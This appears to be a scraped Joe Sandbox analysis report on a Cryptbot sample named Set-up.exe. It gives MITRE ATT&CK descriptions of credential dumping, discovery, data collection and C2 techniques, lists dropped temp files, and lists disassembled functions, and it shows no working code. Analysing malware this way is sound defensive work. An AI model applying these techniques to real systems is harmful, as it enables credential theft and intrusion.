Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\HXocObpYbsjxnCpoVLwZ.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
Set-up.exe

Function 6C2C14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 006F116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 006F15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C2D9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 006F81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Function 006F8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Function 006F13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 006F11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 006F1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C2D9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 006F1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 006F13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C2DB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C2DB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON